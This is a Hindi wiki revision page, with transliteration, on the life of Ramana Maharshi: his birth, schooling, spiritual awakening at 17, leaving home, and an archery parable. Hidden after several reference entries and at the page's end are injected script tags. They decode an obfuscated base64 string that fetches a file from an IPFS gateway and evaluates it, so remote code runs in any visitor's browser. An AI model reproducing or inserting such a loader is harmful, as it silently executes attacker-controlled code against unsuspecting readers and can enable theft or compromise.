Difference between revisions of "रमण महर्षि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''रमण महर्षि''' (जन्म- [[30 दिसम्बर]], [[1879]], तिरुचुली गाँव, [[तमिलनाडु]]; मृत्यु- [[14 अप्रैल]], [[1950]], रमण आश्रम, तमिलनाडु) बीसवीं सदी के महान [[संत]] थे, जिन्होंने तमिलनाडु स्थित पवित्र अरुनाचला पहाड़ी पर गहन साधना की थी। उन्हें केवल [[भारत]] में ही अपितु विदेशो में भी शांत ऋषि के रूप में जाना जाता है। उन्होंने आत्म विचार पर बहुत बल दिया था। रमण महर्षि के संपर्क में आने पर असीम शांति का अनुभव होता था। आज भी लोग शांति कि खोज में तिरुवन्नामलाई स्थित रमण महर्षि के आश्रम अरुनाचला पहाड़ी और अरुनाचलेश्वर मंदिर में जाते हैं। महर्षि ने भारत के साथ-साथ पश्चिम के कई देशो में अपना उजाला फैलाकर देश को गौरवान्वित किया तथा मानव जाति की बहुमूल्य सेवा की। भारत के आध्यात्मिक लाडले सपूतों में रमण महर्षि का नाम अग्रगण्य है।
 
'''रमण महर्षि''' (जन्म- [[30 दिसम्बर]], [[1879]], तिरुचुली गाँव, [[तमिलनाडु]]; मृत्यु- [[14 अप्रैल]], [[1950]], रमण आश्रम, तमिलनाडु) बीसवीं सदी के महान [[संत]] थे, जिन्होंने तमिलनाडु स्थित पवित्र अरुनाचला पहाड़ी पर गहन साधना की थी। उन्हें केवल [[भारत]] में ही अपितु विदेशो में भी शांत ऋषि के रूप में जाना जाता है। उन्होंने आत्म विचार पर बहुत बल दिया था। रमण महर्षि के संपर्क में आने पर असीम शांति का अनुभव होता था। आज भी लोग शांति कि खोज में तिरुवन्नामलाई स्थित रमण महर्षि के आश्रम अरुनाचला पहाड़ी और अरुनाचलेश्वर मंदिर में जाते हैं। महर्षि ने भारत के साथ-साथ पश्चिम के कई देशो में अपना उजाला फैलाकर देश को गौरवान्वित किया तथा मानव जाति की बहुमूल्य सेवा की। भारत के आध्यात्मिक लाडले सपूतों में रमण महर्षि का नाम अग्रगण्य है।
 
==जन्म==
 
==जन्म==
रमण महर्षि का जन्म 30 दिसम्बर, सन 1879 में [[मदुरई]], [[तमिलनाडु]] के पास 'तिरुचुली' नामक गाँव में हुआ था। इनका जन्म 'अद्र दर्शन', भगवान [[शिव]] का प्रसिद्ध पर्व, के दिन हुआ। इनके [[माता]]-[[पिता]] ने उनका नाम वेंकटरमण रखा था, जो बाद में रमण महर्षि के नाम से विश्व में प्रसिद्ध हुए।<ref>{{cite web |url=https://sites.google.com/site/ekatmatastotra/stotra/socioreligiousreformers/maharisi-ramana|title=रमण महर्षि|accessmonthday=13 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
रमण महर्षि का जन्म 30 दिसम्बर, सन 1879 में [[मदुरई]], [[तमिलनाडु]] के पास 'तिरुचुली' नामक गाँव में हुआ था। इनका जन्म 'अद्र दर्शन', भगवान [[शिव]] का प्रसिद्ध पर्व, के दिन हुआ था।<ref name="aa">{{cite web |url=https://sites.google.com/site/ekatmatastotra/stotra/socioreligiousreformers/maharisi-ramana|title=रमण महर्षि|accessmonthday=13 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref> जन्म के बाद रमण के [[माता]]-[[पिता]] ने उनका नाम वेंकटरमण अय्यर रखा था। ये अपने पिता सुन्दरम अय्यर की चार संतानों में से दूसरे थे। बाद के समय में वेंकटरामन अय्यर 'रमण महर्षि' के नाम से विश्व में प्रसिद्ध हुए।
 
====शिक्षा====
 
====शिक्षा====
 
जीवन के आरम्भिक वर्षों में वेंकटरामन में कुछ भी उल्लेखनीय नहीं था। वे एक सामान्य बालक के रूप में ही विकसित हुए थे। उन्हें तिरुचुली के एक प्राइमरी स्कूल में तथा बाद में दिण्डुक्कल के एक स्कूल में शिक्षा के लिए भेजा गया। जब वे बारह वर्ष के थे, तभी इनके [[पिता]] का देहावसान हो गया। ऐसी स्थिति में उन्हें परिवार के साथ अपने चाचा सुब्ब अय्यर के साथ [[मदुरै]] में रहने की आवश्यकता पड़ी। मदुरै में उन्हें पहले 'स्काट मीडिल स्कूल' तथा बाद में 'अमेरिकन मिशन हाईस्कूल' में भेजा गया। यद्यपि वह तीव्र बुद्धि एवं तीव्र स्मरण शक्ति से सम्पन्न थे, किन्तु फिर भी अपनी पढ़ाई के प्रति गंभीर नहीं थे।<ref>{{cite web |url=http://www.sriramanamaharshi.org/hi/%E0%A4%B6%E0%A5%8D%E0%A4%B0%E0%A5%80-%E0%A4%B0%E0%A4%AE%E0%A4%A3-%E0%A4%AE%E0%A4%B9%E0%A4%B0%E0%A5%8D%E0%A4%B7%E0%A4%BF/|title=श्री रमण महर्षि|accessmonthday=13 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
जीवन के आरम्भिक वर्षों में वेंकटरामन में कुछ भी उल्लेखनीय नहीं था। वे एक सामान्य बालक के रूप में ही विकसित हुए थे। उन्हें तिरुचुली के एक प्राइमरी स्कूल में तथा बाद में दिण्डुक्कल के एक स्कूल में शिक्षा के लिए भेजा गया। जब वे बारह वर्ष के थे, तभी इनके [[पिता]] का देहावसान हो गया। ऐसी स्थिति में उन्हें परिवार के साथ अपने चाचा सुब्ब अय्यर के साथ [[मदुरै]] में रहने की आवश्यकता पड़ी। मदुरै में उन्हें पहले 'स्काट मीडिल स्कूल' तथा बाद में 'अमेरिकन मिशन हाईस्कूल' में भेजा गया। यद्यपि वह तीव्र बुद्धि एवं तीव्र स्मरण शक्ति से सम्पन्न थे, किन्तु फिर भी अपनी पढ़ाई के प्रति गंभीर नहीं थे।<ref>{{cite web |url=http://www.sriramanamaharshi.org/hi/%E0%A4%B6%E0%A5%8D%E0%A4%B0%E0%A5%80-%E0%A4%B0%E0%A4%AE%E0%A4%A3-%E0%A4%AE%E0%A4%B9%E0%A4%B0%E0%A5%8D%E0%A4%B7%E0%A4%BF/|title=श्री रमण महर्षि|accessmonthday=13 अक्टूबर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
;बलशाली शरीर
 
;बलशाली शरीर
 
वेंकटरामन स्वस्थ एवं शक्तिशाली शरीर से युक्त थे। इसीलिए उनके साथी उनकी ताकत से डरते थे। वेंकटरामन बहुत गहरी नींद सोते थे। इनकी नींद इतनी गहरी होती थी कि उनके साथियों में से यदि कभी किसी को वेंकटरामन से नाराजगी रहती तो वे उनसे गहरी निद्रावस्था में बदला लेते थे। उन्हें सोया जानकर कहीं दूर जाकर पीटते थे तो भी उनकी नींद नहीं झुलती थी।
 
वेंकटरामन स्वस्थ एवं शक्तिशाली शरीर से युक्त थे। इसीलिए उनके साथी उनकी ताकत से डरते थे। वेंकटरामन बहुत गहरी नींद सोते थे। इनकी नींद इतनी गहरी होती थी कि उनके साथियों में से यदि कभी किसी को वेंकटरामन से नाराजगी रहती तो वे उनसे गहरी निद्रावस्था में बदला लेते थे। उन्हें सोया जानकर कहीं दूर जाकर पीटते थे तो भी उनकी नींद नहीं झुलती थी।
 +
==आध्यात्मिक अनुभव==
 +
बचपन से ही रमण को लगता था कि 'अरुनाचला'<ref>तमिलनाडु के तिरुवन्नामलाई शहर में स्थित एक पवित्र पर्वत और शिव मंदिर।</ref> में कुछ रहस्यमय है, जिसको समझ पाना जरुरी है। जब वह 16 साल के थे तो उनके यहाँ एक बुजुर्ग मिलने के लिए आये। रमण के पूछने पर बुजुर्ग ने बताया कि वो अरुनाचला से आये हैं। यह जानकर वेंकटरमण उनसे बहुत कुछ पूछने के लिए उत्सुक हो गए और अरुनाचला के बारे में बुजुर्ग से कई सवाल पूछे। एक दूसरी घटना ने रमण का ध्यान अरुनाचला की ओर आकर्षित किया और उनकी गहरी आध्यात्मिक भावना को जाग्रत किया। उन्होंने 63 शिव संतो से सम्बंधित एक धार्मिक पुस्तक पढी। यह उनका पहला धार्मिक सहित्य था। इसको पढ़कर वह बहुत रोमांचित हुए। पुस्तक में दिए गए पवित्र संतो के उदाहरण उनके [[हृदय]] को छू गये। इसने उनके हृदय में त्याग और परमेश्वर के प्रति प्रेम की भावना को जाग्रत कर दिया। रमण को 17 वर्ष की अवस्था में आध्यात्मिक अनुभव हुआ।
 +
 +
एक दिन रमण एकांत में अपने चाचा के घर की पहली मंजिल पर बैठे थे। हमेशा की तरह वें पूर्णतः स्वस्थ थे। अचानक से उन्हें मृत्यु के भय का अनुभव हुआ। उन्होंने महसूस किया कि वे मरने के लिए जा रहे हैं। ऐसा क्यों हो रहा था, वह नहीं जानते थे। लेकिन आने वाली मृत्यु से वे बौखलाए नहीं। उन्होंने शांतिपूर्वक सोचा कि क्या करना चाहिए। उन्होंने अपने आप से कहा- "अब मृत्यु आ गयी है!" इसका क्या मतलब है? वह क्या है जो मर रहा है? यह शरीर मर जाता है। वह तत्काल लेट गए। अपने हाथ पैरों को सख्त कर लिया और साँस को रोककर होठों को बंद कर लिया। इस समय उनका जैविक शरीर एक शव के समान था। अब क्या होगा? यह शरीर अब मर चुका है। यह अब जला दिया जायेगा और राख में बदल जायेगा। लेकिन शरीर की मृत्यु के साथ क्या मैं भी मर गया हूँ? क्या मैं शरीर हूँ? यह शरीर तो शांत और निष्क्रिय है। लेकिन मैं तो अपनी पूर्ण शक्ति और यहाँ तक कि आवाज को भी महसूस कर पा रहा हूँ। मैं इस शरीर से परे एक [[आत्मा]] हूँ। शरीर मर जाता है, पर आत्मा को मृत्यु नहीं छू पाती। मैं अमर आत्मा हूँ। बाद में रमण ने इस अनुभव को अपने भक्तों को सुनाया और बताया कि यह अनुभव तर्क की प्रक्रिया से परे है। उन्होंने सीधे सच को जाना और मृत्यु का डर सदा के लिए गायब हो गया। इस प्रकार युवा वेंकटरमण ने बिना किसी साधना के अपने आप को आध्यात्मिकता के शिखर पर पाया। अहंकार स्वयं जागरूकता की बाढ़ में कहीं खो गया। अचानक एक लड़का जो कि वेंकटरमण के नाम से जाना जाता था, एक [[साधु]] और [[संत]] में बदल गया। अब वह एक पूर्ण आत्म-ज्ञान के साथ विकसित ज्ञानी भी था।<ref name="aa"/>
 +
==जीवन परिवर्तन व गृह त्याग==
 +
युवा [[ऋषि]] का जीवन अचानक बदल गया। जो वस्तुएँ पहले मूल्यवान थीं, उन्होंने अपना मूल्य खो दिया। अध्ययन, मित्र, रिश्तेदार, परिवार आदि का उनके जीवन में कोई महत्व नहीं रह गया। वह पूरी तरह अपने परिवेश के प्रति उदासीन हो गये। विनय, गैर प्रतिरोधकता और अन्य गुण उनके श्रंगार बन गये। अकेले बैठते और स्वंय को [[ध्यान]] में लीन रखते। वह रोज '[[मीनाक्षी मंदिर]]' जाते और हर बार भगवान और संतो की मूर्तियों के सामने खड़े होकर एक उमंग का अनुभव करते। उनकी आँखों से लगातार आँसू बहते रहते। एक नई दृष्टि लगातार उनके साथ थी। 17 वर्ष की अल्पायु में ही रमण का व्यवहार एक योगी के समान था। उनके आध्यात्मिक अनुभव के 6 सप्ताह बाद ही एक घटना ने उनको घर-बार छोड़ने के लिए प्रेरित कर दिया। रमण के [[अंग्रेज़ी]] के शिक्षक ने उनकी पढाई की ओर उदासीनता को देखते हुए उन्हें एक अध्याय को तीन बार लिखने के लिए सजा के रूप में दिया। उन्होंने दो बार तो लिखा, लेकिन तीसरी बार इसकी निरर्थकता को जानकर लिखना छोड़ दिया। [[काग़ज़]], किताब एक तरफ़ रख दिए और [[आँख]] बंद करके गहरे ध्यान में चले गये। इसके बाद उन्होंने घर छोड़ने का फैसला कर लिया। उन्हें पता था की उन्हें कहाँ जाना है। उन्होंने पवित्र अरुनाचला पर्वत की यात्रा प्रारंभ कर दी। उन्होंने घर वालों के लिए एक चिट्ठी लिखी, जिसमें लिखा था- "मैं भगवान की खोज में उनके आदेशानुसार जा रहा हूँ..."।
 
==प्रेरक प्रसंग==
 
==प्रेरक प्रसंग==
 
रमण महर्षि बहुत कुशल धनुर्धर भी थे। एक सुबह उन्होंने अपने एक शिष्य को अपनी धनुर्विद्या देखने के लिए बुलाया। शिष्य यह सब पहले ही कई बार देख चुका था, पर वह गुरु की आज्ञा की अवहेलना नहीं कर सकता था। वे समीप ही जंगल में एक विशाल वृक्ष के पास गए। रमण महर्षि के पास एक [[फूल]] था, जिसे उन्होंने पेड़ की एक शाखा पर रख दिया। फिर उन्होंने अपने बस्ते से अपना नायाब [[धनुष अस्त्र|धनुष]], [[बाण अस्त्र|बाण]] और एक कढ़ाई किया हुआ सुंदर रूमाल निकाला। वह फूल से सौ कदम दूर आकर खड़े हो गए और उन्होंने शिष्य से कहा कि वह रूमाल से उनकी [[आँख|आँखें]] ढंककर भली-भांति बंद कर दे। शिष्य ने ऐसा ही किया। रमण महर्षि ने शिष्य से पूछा- "तुमने मुझे धनुर्विद्या की महान कला का अभ्यास करते कितने बार देखा है?" "मैं तो यह सब रोज़ ही देखता हूँ।" शिष्य ने कहा। फिर शिष्य ने रमण महर्षि से कहा- "आप तो तीन सौ कदम दूर से ही फूल पर निशाना लगा सकते हैं।" रूमाल से अपनी आँखें ढंके हुए महर्षि रमण ने अपने पैरों को धरती पर जमाया। उन्होंने पूरी शक्ति से धनुष की प्रत्यंचा को खींचा और तीर छोड़ दिया।
 
रमण महर्षि बहुत कुशल धनुर्धर भी थे। एक सुबह उन्होंने अपने एक शिष्य को अपनी धनुर्विद्या देखने के लिए बुलाया। शिष्य यह सब पहले ही कई बार देख चुका था, पर वह गुरु की आज्ञा की अवहेलना नहीं कर सकता था। वे समीप ही जंगल में एक विशाल वृक्ष के पास गए। रमण महर्षि के पास एक [[फूल]] था, जिसे उन्होंने पेड़ की एक शाखा पर रख दिया। फिर उन्होंने अपने बस्ते से अपना नायाब [[धनुष अस्त्र|धनुष]], [[बाण अस्त्र|बाण]] और एक कढ़ाई किया हुआ सुंदर रूमाल निकाला। वह फूल से सौ कदम दूर आकर खड़े हो गए और उन्होंने शिष्य से कहा कि वह रूमाल से उनकी [[आँख|आँखें]] ढंककर भली-भांति बंद कर दे। शिष्य ने ऐसा ही किया। रमण महर्षि ने शिष्य से पूछा- "तुमने मुझे धनुर्विद्या की महान कला का अभ्यास करते कितने बार देखा है?" "मैं तो यह सब रोज़ ही देखता हूँ।" शिष्य ने कहा। फिर शिष्य ने रमण महर्षि से कहा- "आप तो तीन सौ कदम दूर से ही फूल पर निशाना लगा सकते हैं।" रूमाल से अपनी आँखें ढंके हुए महर्षि रमण ने अपने पैरों को धरती पर जमाया। उन्होंने पूरी शक्ति से धनुष की प्रत्यंचा को खींचा और तीर छोड़ दिया।

Revision as of 12:44, 13 October 2013

raman maharshi (janm- 30 disambar, 1879, tiruchuli gaanv, tamilanadu; mrityu- 14 aprail, 1950, raman ashram, tamilanadu) bisavian sadi ke mahan sant the, jinhoanne tamilanadu sthit pavitr arunachala paha di par gahan sadhana ki thi. unhean keval bharat mean hi apitu videsho mean bhi shaant rrishi ke roop mean jana jata hai. unhoanne atm vichar par bahut bal diya tha. raman maharshi ke sanpark mean ane par asim shaanti ka anubhav hota tha. aj bhi log shaanti ki khoj mean tiruvannamalaee sthit raman maharshi ke ashram arunachala paha di aur arunachaleshvar mandir mean jate haian. maharshi ne bharat ke sath-sath pashchim ke kee desho mean apana ujala phailakar desh ko gauravanvit kiya tatha manav jati ki bahumooly seva ki. bharat ke adhyatmik ladale sapootoan mean raman maharshi ka nam agragany hai.

janm

raman maharshi ka janm 30 disambar, san 1879 mean maduree, tamilanadu ke pas 'tiruchuli' namak gaanv mean hua tha. inaka janm 'adr darshan', bhagavan shiv ka prasiddh parv, ke din hua tha.[1] janm ke bad raman ke mata-pita ne unaka nam veankataraman ayyar rakha tha. ye apane pita sundaram ayyar ki char santanoan mean se doosare the. bad ke samay mean veankataraman ayyar 'raman maharshi' ke nam se vishv mean prasiddh hue.

shiksha

jivan ke arambhik varshoan mean veankataraman mean kuchh bhi ullekhaniy nahian tha. ve ek samany balak ke roop mean hi vikasit hue the. unhean tiruchuli ke ek praimari skool mean tatha bad mean dindukkal ke ek skool mean shiksha ke lie bheja gaya. jab ve barah varsh ke the, tabhi inake pita ka dehavasan ho gaya. aisi sthiti mean unhean parivar ke sath apane chacha subb ayyar ke sath madurai mean rahane ki avashyakata p di. madurai mean unhean pahale 'skat midil skool' tatha bad mean 'amerikan mishan haeeskool' mean bheja gaya. yadyapi vah tivr buddhi evan tivr smaran shakti se sampann the, kintu phir bhi apani padhaee ke prati ganbhir nahian the.[2]

balashali sharir

veankataraman svasth evan shaktishali sharir se yukt the. isilie unake sathi unaki takat se darate the. veankataraman bahut gahari niand sote the. inaki niand itani gahari hoti thi ki unake sathiyoan mean se yadi kabhi kisi ko veankataraman se narajagi rahati to ve unase gahari nidravastha mean badala lete the. unhean soya janakar kahian door jakar pitate the to bhi unaki niand nahian jhulati thi.

adhyatmik anubhav

bachapan se hi raman ko lagata tha ki 'arunachala'[3] mean kuchh rahasyamay hai, jisako samajh pana jaruri hai. jab vah 16 sal ke the to unake yahaan ek bujurg milane ke lie aye. raman ke poochhane par bujurg ne bataya ki vo arunachala se aye haian. yah janakar veankataraman unase bahut kuchh poochhane ke lie utsuk ho ge aur arunachala ke bare mean bujurg se kee saval poochhe. ek doosari ghatana ne raman ka dhyan arunachala ki or akarshit kiya aur unaki gahari adhyatmik bhavana ko jagrat kiya. unhoanne 63 shiv santo se sambandhit ek dharmik pustak padhi. yah unaka pahala dharmik sahity tha. isako padhakar vah bahut romaanchit hue. pustak mean die ge pavitr santo ke udaharan unake hriday ko chhoo gaye. isane unake hriday mean tyag aur parameshvar ke prati prem ki bhavana ko jagrat kar diya. raman ko 17 varsh ki avastha mean adhyatmik anubhav hua.

ek din raman ekaant mean apane chacha ke ghar ki pahali manjil par baithe the. hamesha ki tarah vean poornatah svasth the. achanak se unhean mrityu ke bhay ka anubhav hua. unhoanne mahasoos kiya ki ve marane ke lie ja rahe haian. aisa kyoan ho raha tha, vah nahian janate the. lekin ane vali mrityu se ve baukhalae nahian. unhoanne shaantipoorvak socha ki kya karana chahie. unhoanne apane ap se kaha- "ab mrityu a gayi hai!" isaka kya matalab hai? vah kya hai jo mar raha hai? yah sharir mar jata hai. vah tatkal let ge. apane hath pairoan ko sakht kar liya aur saans ko rokakar hothoan ko band kar liya. is samay unaka jaivik sharir ek shav ke saman tha. ab kya hoga? yah sharir ab mar chuka hai. yah ab jala diya jayega aur rakh mean badal jayega. lekin sharir ki mrityu ke sath kya maian bhi mar gaya hooan? kya maian sharir hooan? yah sharir to shaant aur nishkriy hai. lekin maian to apani poorn shakti aur yahaan tak ki avaj ko bhi mahasoos kar pa raha hooan. maian is sharir se pare ek atma hooan. sharir mar jata hai, par atma ko mrityu nahian chhoo pati. maian amar atma hooan. bad mean raman ne is anubhav ko apane bhaktoan ko sunaya aur bataya ki yah anubhav tark ki prakriya se pare hai. unhoanne sidhe sach ko jana aur mrityu ka dar sada ke lie gayab ho gaya. is prakar yuva veankataraman ne bina kisi sadhana ke apane ap ko adhyatmikata ke shikhar par paya. ahankar svayan jagarookata ki badh mean kahian kho gaya. achanak ek l daka jo ki veankataraman ke nam se jana jata tha, ek sadhu aur sant mean badal gaya. ab vah ek poorn atm-jnan ke sath vikasit jnani bhi tha.[1]

jivan parivartan v grih tyag

yuva rrishi ka jivan achanak badal gaya. jo vastuean pahale moolyavan thian, unhoanne apana mooly kho diya. adhyayan, mitr, rishtedar, parivar adi ka unake jivan mean koee mahatv nahian rah gaya. vah poori tarah apane parivesh ke prati udasin ho gaye. vinay, gair pratirodhakata aur any gun unake shrangar ban gaye. akele baithate aur svany ko dhyan mean lin rakhate. vah roj 'minakshi mandir' jate aur har bar bhagavan aur santo ki moortiyoan ke samane kh de hokar ek umang ka anubhav karate. unaki aankhoan se lagatar aansoo bahate rahate. ek nee drishti lagatar unake sath thi. 17 varsh ki alpayu mean hi raman ka vyavahar ek yogi ke saman tha. unake adhyatmik anubhav ke 6 saptah bad hi ek ghatana ne unako ghar-bar chho dane ke lie prerit kar diya. raman ke aangrezi ke shikshak ne unaki padhaee ki or udasinata ko dekhate hue unhean ek adhyay ko tin bar likhane ke lie saja ke roop mean diya. unhoanne do bar to likha, lekin tisari bar isaki nirarthakata ko janakar likhana chho d diya. kagaz, kitab ek taraf rakh die aur aankh band karake gahare dhyan mean chale gaye. isake bad unhoanne ghar chho dane ka phaisala kar liya. unhean pata tha ki unhean kahaan jana hai. unhoanne pavitr arunachala parvat ki yatra praranbh kar di. unhoanne ghar valoan ke lie ek chitthi likhi, jisamean likha tha- "maian bhagavan ki khoj mean unake adeshanusar ja raha hooan...".

prerak prasang

raman maharshi bahut kushal dhanurdhar bhi the. ek subah unhoanne apane ek shishy ko apani dhanurvidya dekhane ke lie bulaya. shishy yah sab pahale hi kee bar dekh chuka tha, par vah guru ki ajna ki avahelana nahian kar sakata tha. ve samip hi jangal mean ek vishal vriksh ke pas ge. raman maharshi ke pas ek phool tha, jise unhoanne pe d ki ek shakha par rakh diya. phir unhoanne apane baste se apana nayab dhanush, ban aur ek kadhaee kiya hua suandar roomal nikala. vah phool se sau kadam door akar kh de ho ge aur unhoanne shishy se kaha ki vah roomal se unaki aankhean dhankakar bhali-bhaanti band kar de. shishy ne aisa hi kiya. raman maharshi ne shishy se poochha- "tumane mujhe dhanurvidya ki mahan kala ka abhyas karate kitane bar dekha hai?" "maian to yah sab roz hi dekhata hooan." shishy ne kaha. phir shishy ne raman maharshi se kaha- "ap to tin sau kadam door se hi phool par nishana laga sakate haian." roomal se apani aankhean dhanke hue maharshi raman ne apane pairoan ko dharati par jamaya. unhoanne poori shakti se dhanush ki pratyancha ko khiancha aur tir chho d diya.

hava ko chirata hua tir phool se bahut door, yahaan tak ki pe d se bhi nahian takaraya aur lakshy se bahut door ja gira. "tir lakshy par lag gaya n?" apani aankhean kholate hue maharshi raman ne poochha. shishy ne uttar diya- "nahian, vah to lakshy ke pas bhi nahian laga. mujhe laga ki ap isake dvara sankalp ki shakti ya apani parashaktiyoan ka pradarshan karane vale the." maharshi ne kaha- "maianne tumhean sankalp shakti ka sabase mahatvapoorn path hi to padhaya hai. tum jis bhi vastu ki ichchha karo, apana poora dhyan usi par lagao. koee bhi us lakshy ko nahian vedh sakata, jo dikhaee hi n deta ho."[4]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 raman maharshi (hindi). . abhigaman tithi: 13 aktoobar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. shri raman maharshi (hindi). . abhigaman tithi: 13 aktoobar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  3. tamilanadu ke tiruvannamalaee shahar mean sthit ek pavitr parvat aur shiv mandir.
  4. sankalp ki shakti (hindi). . abhigaman tithi: 13 aktoobar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>